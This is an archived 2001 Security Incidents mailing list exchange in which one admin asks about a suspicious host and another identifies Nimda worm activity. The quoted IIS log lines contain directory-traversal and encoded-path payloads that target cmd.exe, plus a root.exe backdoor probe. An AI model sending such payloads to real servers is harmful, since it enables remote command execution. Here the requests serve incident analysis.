Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: code red request, but cant be resolved?

From: Mike Shaw <mshaw () wwisp com>
Date: Thu, 25 Oct 2001 16:26:40 -0500
It has a reverse lookup (64.148.216.72) but no forward lookup. That IP block is indeed owned by Internetconnect. 

Looks like simple Nimdaness to me.

-Mike

At 04:08 PM 10/25/2001 -0500, Emre Yildirim wrote:

Hi,

I just got this.  Is it just me, or is this address spoofed?
Can anyone resolve dsl-6414821672.internetconnect.net?
dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 279 "-" "-" dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" 



--
Emre Yildirim <emre () asper org>
GPG KeyID 0xF9E4A1D1 (keyserver.pgp.com)


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com 



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: